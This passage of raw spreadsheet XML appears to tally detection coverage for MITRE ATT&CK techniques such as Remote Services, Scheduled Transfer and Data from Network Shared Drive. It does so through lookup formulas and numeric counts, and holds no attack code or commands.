        <v>0 (0)</v>
      </c>
      <c r="P8" s="12">
        <v>0</v>
      </c>
      <c r="Q8" s="13">
        <v>0</v>
      </c>
      <c r="R8" s="394">
        <v>0</v>
      </c>
      <c r="S8" s="292">
        <v>11</v>
      </c>
      <c r="T8" s="322">
        <v>2</v>
      </c>
      <c r="U8" s="322" t="str">
        <f t="shared" si="2"/>
        <v>2 (11)</v>
      </c>
      <c r="V8" s="12">
        <v>1</v>
      </c>
      <c r="W8" s="13">
        <v>1</v>
      </c>
      <c r="X8" s="394">
        <v>2</v>
      </c>
      <c r="Y8" s="392">
        <v>11</v>
      </c>
      <c r="Z8" s="392">
        <v>2</v>
      </c>
      <c r="AA8" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (11)</v>
      </c>
      <c r="AB8" s="392">
        <v>1</v>
      </c>
      <c r="AC8" s="16">
        <v>1</v>
      </c>
      <c r="AD8" s="394">
        <v>2</v>
      </c>
      <c r="AE8" s="392">
        <v>10</v>
      </c>
      <c r="AF8" s="392">
        <v>8</v>
      </c>
      <c r="AG8" s="322" t="str">
        <f t="shared" si="4"/>
        <v>8 (10)</v>
      </c>
      <c r="AH8" s="392">
        <v>2</v>
      </c>
      <c r="AI8" s="16">
        <v>1</v>
      </c>
      <c r="AJ8" s="394">
        <v>7</v>
      </c>
      <c r="AK8" s="392">
        <v>21</v>
      </c>
      <c r="AL8" s="392">
        <v>10</v>
      </c>
      <c r="AM8" s="322" t="str">
        <f t="shared" si="5"/>
        <v>10 (21)</v>
      </c>
      <c r="AN8" s="392">
        <v>3</v>
      </c>
      <c r="AO8" s="16">
        <v>1</v>
      </c>
      <c r="AP8" s="394">
        <v>8</v>
      </c>
      <c r="AQ8" s="292">
        <v>0</v>
      </c>
      <c r="AR8" s="322">
        <v>0</v>
      </c>
      <c r="AS8" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT8" s="12">
        <v>0</v>
      </c>
      <c r="AU8" s="13">
        <v>0</v>
      </c>
      <c r="AV8" s="394">
        <v>0</v>
      </c>
      <c r="AW8" s="392">
        <v>0</v>
      </c>
      <c r="AX8" s="392">
        <v>0</v>
      </c>
      <c r="AY8" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ8" s="4">
        <v>0</v>
      </c>
      <c r="BA8" s="16">
        <v>0</v>
      </c>
      <c r="BB8" s="394">
        <v>0</v>
      </c>
      <c r="BC8" s="292">
        <v>11</v>
      </c>
      <c r="BD8" s="322">
        <v>2</v>
      </c>
      <c r="BE8" s="322" t="str">
        <f t="shared" si="8"/>
        <v>2 (11)</v>
      </c>
      <c r="BF8" s="12">
        <v>1</v>
      </c>
      <c r="BG8" s="13">
        <v>1</v>
      </c>
      <c r="BH8" s="394">
        <v>2</v>
      </c>
      <c r="BI8" s="292">
        <v>1</v>
      </c>
      <c r="BJ8" s="322">
        <v>1</v>
      </c>
      <c r="BK8" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL8" s="12">
        <v>1</v>
      </c>
      <c r="BM8" s="13">
        <v>1</v>
      </c>
      <c r="BN8" s="394">
        <v>1</v>
      </c>
      <c r="BO8" s="292">
        <v>48</v>
      </c>
      <c r="BP8" s="322">
        <v>21</v>
      </c>
      <c r="BQ8" s="322" t="str">
        <f t="shared" si="10"/>
        <v>21 (48)</v>
      </c>
      <c r="BR8" s="12">
        <v>1</v>
      </c>
      <c r="BS8" s="12">
        <v>3</v>
      </c>
      <c r="BT8" s="13">
        <v>1</v>
      </c>
      <c r="BU8" s="394">
        <v>20</v>
      </c>
      <c r="BV8" s="292">
        <v>0</v>
      </c>
      <c r="BW8" s="322">
        <v>0</v>
      </c>
      <c r="BX8" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY8" s="12">
        <v>0</v>
      </c>
      <c r="BZ8" s="13">
        <v>0</v>
      </c>
      <c r="CA8" s="394">
        <v>0</v>
      </c>
      <c r="CB8" s="292">
        <v>1</v>
      </c>
      <c r="CC8" s="322">
        <v>1</v>
      </c>
      <c r="CD8" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE8" s="12">
        <v>0</v>
      </c>
      <c r="CF8" s="12">
        <v>1</v>
      </c>
      <c r="CG8" s="13">
        <v>1</v>
      </c>
      <c r="CH8" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:93" ht="15" customHeight="1">
      <c r="A9" s="4">
        <f t="shared" si="13"/>
        <v>7</v>
      </c>
      <c r="B9" s="4" t="str">
        <f>IFERROR(VLOOKUP(A9,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1021</v>
      </c>
      <c r="C9" s="493" t="str">
        <f>IFERROR(VLOOKUP(B9,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Services</v>
      </c>
      <c r="D9" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B9)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E9" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B9,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F9" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G9" s="292">
        <v>3</v>
      </c>
      <c r="H9" s="322">
        <v>1</v>
      </c>
      <c r="I9" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (3)</v>
      </c>
      <c r="J9" s="12">
        <v>1</v>
      </c>
      <c r="K9" s="13">
        <v>1</v>
      </c>
      <c r="L9" s="394">
        <v>1</v>
      </c>
      <c r="M9" s="322">
        <v>0</v>
      </c>
      <c r="N9" s="322">
        <v>0</v>
      </c>
      <c r="O9" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P9" s="12">
        <v>0</v>
      </c>
      <c r="Q9" s="13">
        <v>0</v>
      </c>
      <c r="R9" s="394">
        <v>0</v>
      </c>
      <c r="S9" s="292">
        <v>3</v>
      </c>
      <c r="T9" s="322">
        <v>1</v>
      </c>
      <c r="U9" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (3)</v>
      </c>
      <c r="V9" s="12">
        <v>1</v>
      </c>
      <c r="W9" s="13">
        <v>1</v>
      </c>
      <c r="X9" s="394">
        <v>1</v>
      </c>
      <c r="Y9" s="392">
        <v>4</v>
      </c>
      <c r="Z9" s="392">
        <v>2</v>
      </c>
      <c r="AA9" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (4)</v>
      </c>
      <c r="AB9" s="392">
        <v>2</v>
      </c>
      <c r="AC9" s="16">
        <v>1</v>
      </c>
      <c r="AD9" s="394">
        <v>1</v>
      </c>
      <c r="AE9" s="392">
        <v>4</v>
      </c>
      <c r="AF9" s="392">
        <v>2</v>
      </c>
      <c r="AG9" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH9" s="392">
        <v>2</v>
      </c>
      <c r="AI9" s="16">
        <v>1</v>
      </c>
      <c r="AJ9" s="394">
        <v>1</v>
      </c>
      <c r="AK9" s="392">
        <v>8</v>
      </c>
      <c r="AL9" s="392">
        <v>4</v>
      </c>
      <c r="AM9" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (8)</v>
      </c>
      <c r="AN9" s="392">
        <v>4</v>
      </c>
      <c r="AO9" s="16">
        <v>1</v>
      </c>
      <c r="AP9" s="394">
        <v>1</v>
      </c>
      <c r="AQ9" s="292">
        <v>0</v>
      </c>
      <c r="AR9" s="322">
        <v>0</v>
      </c>
      <c r="AS9" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT9" s="12">
        <v>0</v>
      </c>
      <c r="AU9" s="13">
        <v>0</v>
      </c>
      <c r="AV9" s="394">
        <v>0</v>
      </c>
      <c r="AW9" s="392">
        <v>1</v>
      </c>
      <c r="AX9" s="392">
        <v>1</v>
      </c>
      <c r="AY9" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ9" s="4">
        <v>1</v>
      </c>
      <c r="BA9" s="16">
        <v>1</v>
      </c>
      <c r="BB9" s="394">
        <v>1</v>
      </c>
      <c r="BC9" s="292">
        <v>4</v>
      </c>
      <c r="BD9" s="322">
        <v>2</v>
      </c>
      <c r="BE9" s="322" t="str">
        <f t="shared" si="8"/>
        <v>2 (4)</v>
      </c>
      <c r="BF9" s="12">
        <v>2</v>
      </c>
      <c r="BG9" s="13">
        <v>1</v>
      </c>
      <c r="BH9" s="394">
        <v>1</v>
      </c>
      <c r="BI9" s="292">
        <v>1</v>
      </c>
      <c r="BJ9" s="322">
        <v>1</v>
      </c>
      <c r="BK9" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL9" s="12">
        <v>1</v>
      </c>
      <c r="BM9" s="13">
        <v>1</v>
      </c>
      <c r="BN9" s="394">
        <v>1</v>
      </c>
      <c r="BO9" s="292">
        <v>2</v>
      </c>
      <c r="BP9" s="322">
        <v>2</v>
      </c>
      <c r="BQ9" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR9" s="12">
        <v>1</v>
      </c>
      <c r="BS9" s="12">
        <v>1</v>
      </c>
      <c r="BT9" s="13">
        <v>1</v>
      </c>
      <c r="BU9" s="394">
        <v>1</v>
      </c>
      <c r="BV9" s="292">
        <v>0</v>
      </c>
      <c r="BW9" s="322">
        <v>0</v>
      </c>
      <c r="BX9" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY9" s="12">
        <v>0</v>
      </c>
      <c r="BZ9" s="13">
        <v>0</v>
      </c>
      <c r="CA9" s="394">
        <v>0</v>
      </c>
      <c r="CB9" s="292">
        <v>1</v>
      </c>
      <c r="CC9" s="322">
        <v>1</v>
      </c>
      <c r="CD9" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE9" s="12">
        <v>0</v>
      </c>
      <c r="CF9" s="12">
        <v>1</v>
      </c>
      <c r="CG9" s="13">
        <v>1</v>
      </c>
      <c r="CH9" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:93" ht="15" customHeight="1">
      <c r="A10" s="4">
        <f t="shared" si="13"/>
        <v>8</v>
      </c>
      <c r="B10" s="4" t="str">
        <f>IFERROR(VLOOKUP(A10,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1029</v>
      </c>
      <c r="C10" s="493" t="str">
        <f>IFERROR(VLOOKUP(B10,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Scheduled Transfer</v>
      </c>
      <c r="D10" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B10)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E10" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B10,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>9</v>
      </c>
      <c r="F10" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (9)</v>
      </c>
      <c r="G10" s="292">
        <v>5</v>
      </c>
      <c r="H10" s="322">
        <v>2</v>
      </c>
      <c r="I10" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (5)</v>
      </c>
      <c r="J10" s="12">
        <v>2</v>
      </c>
      <c r="K10" s="13">
        <v>1</v>
      </c>
      <c r="L10" s="394">
        <v>1</v>
      </c>
      <c r="M10" s="322">
        <v>3</v>
      </c>
      <c r="N10" s="322">
        <v>3</v>
      </c>
      <c r="O10" s="322" t="str">
        <f t="shared" si="1"/>
        <v>3 (3)</v>
      </c>
      <c r="P10" s="12">
        <v>3</v>
      </c>
      <c r="Q10" s="13">
        <v>1</v>
      </c>
      <c r="R10" s="394">
        <v>1</v>
      </c>
      <c r="S10" s="292">
        <v>8</v>
      </c>
      <c r="T10" s="322">
        <v>5</v>
      </c>
      <c r="U10" s="322" t="str">
        <f t="shared" si="2"/>
        <v>5 (8)</v>
      </c>
      <c r="V10" s="12">
        <v>5</v>
      </c>
      <c r="W10" s="13">
        <v>1</v>
      </c>
      <c r="X10" s="394">
        <v>2</v>
      </c>
      <c r="Y10" s="392">
        <v>43</v>
      </c>
      <c r="Z10" s="392">
        <v>3</v>
      </c>
      <c r="AA10" s="322" t="str">
        <f t="shared" si="3"/>
        <v>3 (43)</v>
      </c>
      <c r="AB10" s="392">
        <v>3</v>
      </c>
      <c r="AC10" s="16">
        <v>1</v>
      </c>
      <c r="AD10" s="394">
        <v>2</v>
      </c>
      <c r="AE10" s="392">
        <v>7</v>
      </c>
      <c r="AF10" s="392">
        <v>5</v>
      </c>
      <c r="AG10" s="322" t="str">
        <f t="shared" si="4"/>
        <v>5 (7)</v>
      </c>
      <c r="AH10" s="392">
        <v>5</v>
      </c>
      <c r="AI10" s="16">
        <v>1</v>
      </c>
      <c r="AJ10" s="394">
        <v>1</v>
      </c>
      <c r="AK10" s="392">
        <v>50</v>
      </c>
      <c r="AL10" s="392">
        <v>8</v>
      </c>
      <c r="AM10" s="322" t="str">
        <f t="shared" si="5"/>
        <v>8 (50)</v>
      </c>
      <c r="AN10" s="392">
        <v>8</v>
      </c>
      <c r="AO10" s="16">
        <v>1</v>
      </c>
      <c r="AP10" s="394">
        <v>2</v>
      </c>
      <c r="AQ10" s="292">
        <v>0</v>
      </c>
      <c r="AR10" s="322">
        <v>0</v>
      </c>
      <c r="AS10" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT10" s="12">
        <v>0</v>
      </c>
      <c r="AU10" s="13">
        <v>0</v>
      </c>
      <c r="AV10" s="394">
        <v>0</v>
      </c>
      <c r="AW10" s="392">
        <v>0</v>
      </c>
      <c r="AX10" s="392">
        <v>0</v>
      </c>
      <c r="AY10" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ10" s="4">
        <v>0</v>
      </c>
      <c r="BA10" s="16">
        <v>0</v>
      </c>
      <c r="BB10" s="394">
        <v>0</v>
      </c>
      <c r="BC10" s="292">
        <v>8</v>
      </c>
      <c r="BD10" s="322">
        <v>5</v>
      </c>
      <c r="BE10" s="322" t="str">
        <f t="shared" si="8"/>
        <v>5 (8)</v>
      </c>
      <c r="BF10" s="12">
        <v>5</v>
      </c>
      <c r="BG10" s="13">
        <v>1</v>
      </c>
      <c r="BH10" s="394">
        <v>2</v>
      </c>
      <c r="BI10" s="292">
        <v>3</v>
      </c>
      <c r="BJ10" s="322">
        <v>2</v>
      </c>
      <c r="BK10" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL10" s="12">
        <v>2</v>
      </c>
      <c r="BM10" s="13">
        <v>1</v>
      </c>
      <c r="BN10" s="394">
        <v>2</v>
      </c>
      <c r="BO10" s="292">
        <v>10</v>
      </c>
      <c r="BP10" s="322">
        <v>9</v>
      </c>
      <c r="BQ10" s="322" t="str">
        <f t="shared" si="10"/>
        <v>9 (10)</v>
      </c>
      <c r="BR10" s="12">
        <v>2</v>
      </c>
      <c r="BS10" s="12">
        <v>3</v>
      </c>
      <c r="BT10" s="13">
        <v>1</v>
      </c>
      <c r="BU10" s="394">
        <v>7</v>
      </c>
      <c r="BV10" s="292">
        <v>1</v>
      </c>
      <c r="BW10" s="322">
        <v>1</v>
      </c>
      <c r="BX10" s="322" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY10" s="12">
        <v>1</v>
      </c>
      <c r="BZ10" s="13">
        <v>1</v>
      </c>
      <c r="CA10" s="394">
        <v>1</v>
      </c>
      <c r="CB10" s="292">
        <v>4</v>
      </c>
      <c r="CC10" s="322">
        <v>1</v>
      </c>
      <c r="CD10" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (4)</v>
      </c>
      <c r="CE10" s="12">
        <v>0</v>
      </c>
      <c r="CF10" s="12">
        <v>1</v>
      </c>
      <c r="CG10" s="13">
        <v>1</v>
      </c>
      <c r="CH10" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:93" ht="15" customHeight="1">
      <c r="A11" s="4">
        <f t="shared" si="13"/>
        <v>9</v>
      </c>
      <c r="B11" s="4" t="str">
        <f>IFERROR(VLOOKUP(A11,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1030</v>
      </c>
      <c r="C11" s="493" t="str">
        <f>IFERROR(VLOOKUP(B11,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="D11" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B11)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E11" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B11,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>68</v>
      </c>
      <c r="F11" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (68)</v>
      </c>
      <c r="G11" s="292">
        <v>63</v>
      </c>
      <c r="H11" s="322">
        <v>32</v>
      </c>
      <c r="I11" s="322" t="str">
        <f t="shared" si="0"/>
        <v>32 (63)</v>
      </c>
      <c r="J11" s="12">
        <v>1</v>
      </c>
      <c r="K11" s="13">
        <v>1</v>
      </c>
      <c r="L11" s="394">
        <v>32</v>
      </c>
      <c r="M11" s="322">
        <v>1</v>
      </c>
      <c r="N11" s="322">
        <v>1</v>
      </c>
      <c r="O11" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P11" s="12">
        <v>1</v>
      </c>
      <c r="Q11" s="13">
        <v>1</v>
      </c>
      <c r="R11" s="394">
        <v>1</v>
      </c>
      <c r="S11" s="292">
        <v>64</v>
      </c>
      <c r="T11" s="322">
        <v>33</v>
      </c>
      <c r="U11" s="322" t="str">
        <f t="shared" si="2"/>
        <v>33 (64)</v>
      </c>
      <c r="V11" s="12">
        <v>2</v>
      </c>
      <c r="W11" s="13">
        <v>1</v>
      </c>
      <c r="X11" s="394">
        <v>32</v>
      </c>
      <c r="Y11" s="392">
        <v>63</v>
      </c>
      <c r="Z11" s="392">
        <v>32</v>
      </c>
      <c r="AA11" s="322" t="str">
        <f t="shared" si="3"/>
        <v>32 (63)</v>
      </c>
      <c r="AB11" s="392">
        <v>1</v>
      </c>
      <c r="AC11" s="16">
        <v>1</v>
      </c>
      <c r="AD11" s="394">
        <v>32</v>
      </c>
      <c r="AE11" s="392">
        <v>6</v>
      </c>
      <c r="AF11" s="392">
        <v>4</v>
      </c>
      <c r="AG11" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (6)</v>
      </c>
      <c r="AH11" s="392">
        <v>4</v>
      </c>
      <c r="AI11" s="16">
        <v>1</v>
      </c>
      <c r="AJ11" s="394">
        <v>3</v>
      </c>
      <c r="AK11" s="392">
        <v>69</v>
      </c>
      <c r="AL11" s="392">
        <v>36</v>
      </c>
      <c r="AM11" s="322" t="str">
        <f t="shared" si="5"/>
        <v>36 (69)</v>
      </c>
      <c r="AN11" s="392">
        <v>5</v>
      </c>
      <c r="AO11" s="16">
        <v>1</v>
      </c>
      <c r="AP11" s="394">
        <v>34</v>
      </c>
      <c r="AQ11" s="292">
        <v>0</v>
      </c>
      <c r="AR11" s="322">
        <v>0</v>
      </c>
      <c r="AS11" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT11" s="12">
        <v>0</v>
      </c>
      <c r="AU11" s="13">
        <v>0</v>
      </c>
      <c r="AV11" s="394">
        <v>0</v>
      </c>
      <c r="AW11" s="392">
        <v>0</v>
      </c>
      <c r="AX11" s="392">
        <v>0</v>
      </c>
      <c r="AY11" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ11" s="4">
        <v>0</v>
      </c>
      <c r="BA11" s="16">
        <v>0</v>
      </c>
      <c r="BB11" s="394">
        <v>0</v>
      </c>
      <c r="BC11" s="292">
        <v>64</v>
      </c>
      <c r="BD11" s="322">
        <v>33</v>
      </c>
      <c r="BE11" s="322" t="str">
        <f t="shared" si="8"/>
        <v>33 (64)</v>
      </c>
      <c r="BF11" s="12">
        <v>2</v>
      </c>
      <c r="BG11" s="13">
        <v>1</v>
      </c>
      <c r="BH11" s="394">
        <v>32</v>
      </c>
      <c r="BI11" s="292">
        <v>9</v>
      </c>
      <c r="BJ11" s="322">
        <v>5</v>
      </c>
      <c r="BK11" s="322" t="str">
        <f t="shared" si="9"/>
        <v>5 (9)</v>
      </c>
      <c r="BL11" s="12">
        <v>2</v>
      </c>
      <c r="BM11" s="13">
        <v>1</v>
      </c>
      <c r="BN11" s="394">
        <v>5</v>
      </c>
      <c r="BO11" s="292">
        <v>62</v>
      </c>
      <c r="BP11" s="322">
        <v>33</v>
      </c>
      <c r="BQ11" s="322" t="str">
        <f t="shared" si="10"/>
        <v>33 (62)</v>
      </c>
      <c r="BR11" s="12">
        <v>2</v>
      </c>
      <c r="BS11" s="12">
        <v>3</v>
      </c>
      <c r="BT11" s="13">
        <v>1</v>
      </c>
      <c r="BU11" s="394">
        <v>33</v>
      </c>
      <c r="BV11" s="292">
        <v>0</v>
      </c>
      <c r="BW11" s="322">
        <v>0</v>
      </c>
      <c r="BX11" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY11" s="12">
        <v>0</v>
      </c>
      <c r="BZ11" s="13">
        <v>0</v>
      </c>
      <c r="CA11" s="394">
        <v>0</v>
      </c>
      <c r="CB11" s="292">
        <v>0</v>
      </c>
      <c r="CC11" s="322">
        <v>0</v>
      </c>
      <c r="CD11" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE11" s="12">
        <v>0</v>
      </c>
      <c r="CF11" s="12">
        <v>0</v>
      </c>
      <c r="CG11" s="13">
        <v>0</v>
      </c>
      <c r="CH11" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:93" ht="15" customHeight="1">
      <c r="A12" s="4">
        <f t="shared" si="13"/>
        <v>10</v>
      </c>
      <c r="B12" s="4" t="str">
        <f>IFERROR(VLOOKUP(A12,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1033</v>
      </c>
      <c r="C12" s="493" t="str">
        <f>IFERROR(VLOOKUP(B12,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>System Owner/User Discovery</v>
      </c>
      <c r="D12" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B12)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E12" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B12,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>13</v>
      </c>
      <c r="F12" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (13)</v>
      </c>
      <c r="G12" s="292">
        <v>0</v>
      </c>
      <c r="H12" s="322">
        <v>0</v>
      </c>
      <c r="I12" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J12" s="12">
        <v>0</v>
      </c>
      <c r="K12" s="13">
        <v>0</v>
      </c>
      <c r="L12" s="394">
        <v>0</v>
      </c>
      <c r="M12" s="322">
        <v>0</v>
      </c>
      <c r="N12" s="322">
        <v>0</v>
      </c>
      <c r="O12" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P12" s="12">
        <v>0</v>
      </c>
      <c r="Q12" s="13">
        <v>0</v>
      </c>
      <c r="R12" s="394">
        <v>0</v>
      </c>
      <c r="S12" s="292">
        <v>0</v>
      </c>
      <c r="T12" s="322">
        <v>0</v>
      </c>
      <c r="U12" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V12" s="12">
        <v>0</v>
      </c>
      <c r="W12" s="13">
        <v>0</v>
      </c>
      <c r="X12" s="394">
        <v>0</v>
      </c>
      <c r="Y12" s="392">
        <v>1</v>
      </c>
      <c r="Z12" s="392">
        <v>1</v>
      </c>
      <c r="AA12" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB12" s="392">
        <v>1</v>
      </c>
      <c r="AC12" s="16">
        <v>1</v>
      </c>
      <c r="AD12" s="394">
        <v>1</v>
      </c>
      <c r="AE12" s="392">
        <v>2</v>
      </c>
      <c r="AF12" s="392">
        <v>2</v>
      </c>
      <c r="AG12" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (2)</v>
      </c>
      <c r="AH12" s="392">
        <v>2</v>
      </c>
      <c r="AI12" s="16">
        <v>1</v>
      </c>
      <c r="AJ12" s="394">
        <v>1</v>
      </c>
      <c r="AK12" s="392">
        <v>3</v>
      </c>
      <c r="AL12" s="392">
        <v>3</v>
      </c>
      <c r="AM12" s="322" t="str">
        <f t="shared" si="5"/>
        <v>3 (3)</v>
      </c>
      <c r="AN12" s="392">
        <v>3</v>
      </c>
      <c r="AO12" s="16">
        <v>1</v>
      </c>
      <c r="AP12" s="394">
        <v>2</v>
      </c>
      <c r="AQ12" s="292">
        <v>0</v>
      </c>
      <c r="AR12" s="322">
        <v>0</v>
      </c>
      <c r="AS12" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT12" s="12">
        <v>0</v>
      </c>
      <c r="AU12" s="13">
        <v>0</v>
      </c>
      <c r="AV12" s="394">
        <v>0</v>
      </c>
      <c r="AW12" s="392">
        <v>0</v>
      </c>
      <c r="AX12" s="392">
        <v>0</v>
      </c>
      <c r="AY12" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ12" s="4">
        <v>0</v>
      </c>
      <c r="BA12" s="16">
        <v>0</v>
      </c>
      <c r="BB12" s="394">
        <v>0</v>
      </c>
      <c r="BC12" s="292">
        <v>0</v>
      </c>
      <c r="BD12" s="322">
        <v>0</v>
      </c>
      <c r="BE12" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF12" s="12">
        <v>0</v>
      </c>
      <c r="BG12" s="13">
        <v>0</v>
      </c>
      <c r="BH12" s="394">
        <v>0</v>
      </c>
      <c r="BI12" s="292">
        <v>0</v>
      </c>
      <c r="BJ12" s="322">
        <v>0</v>
      </c>
      <c r="BK12" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL12" s="12">
        <v>0</v>
      </c>
      <c r="BM12" s="13">
        <v>0</v>
      </c>
      <c r="BN12" s="394">
        <v>0</v>
      </c>
      <c r="BO12" s="292">
        <v>8</v>
      </c>
      <c r="BP12" s="322">
        <v>8</v>
      </c>
      <c r="BQ12" s="322" t="str">
        <f t="shared" si="10"/>
        <v>8 (8)</v>
      </c>
      <c r="BR12" s="12">
        <v>0</v>
      </c>
      <c r="BS12" s="12">
        <v>4</v>
      </c>
      <c r="BT12" s="13">
        <v>1</v>
      </c>
      <c r="BU12" s="394">
        <v>7</v>
      </c>
      <c r="BV12" s="292">
        <v>0</v>
      </c>
      <c r="BW12" s="322">
        <v>0</v>
      </c>
      <c r="BX12" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY12" s="12">
        <v>0</v>
      </c>
      <c r="BZ12" s="13">
        <v>0</v>
      </c>
      <c r="CA12" s="394">
        <v>0</v>
      </c>
      <c r="CB12" s="292">
        <v>5</v>
      </c>
      <c r="CC12" s="322">
        <v>1</v>
      </c>
      <c r="CD12" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (5)</v>
      </c>
      <c r="CE12" s="12">
        <v>0</v>
      </c>
      <c r="CF12" s="12">
        <v>1</v>
      </c>
      <c r="CG12" s="13">
        <v>1</v>
      </c>
      <c r="CH12" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:93" ht="15" customHeight="1">
      <c r="A13" s="4">
        <f t="shared" si="13"/>
        <v>11</v>
      </c>
      <c r="B13" s="4" t="str">
        <f>IFERROR(VLOOKUP(A13,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1039</v>
      </c>
      <c r="C13" s="493" t="str">
        <f>IFERROR(VLOOKUP(B13,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data from Network Shared Drive</v>
      </c>
      <c r="D13" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B13)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E13" s="493">
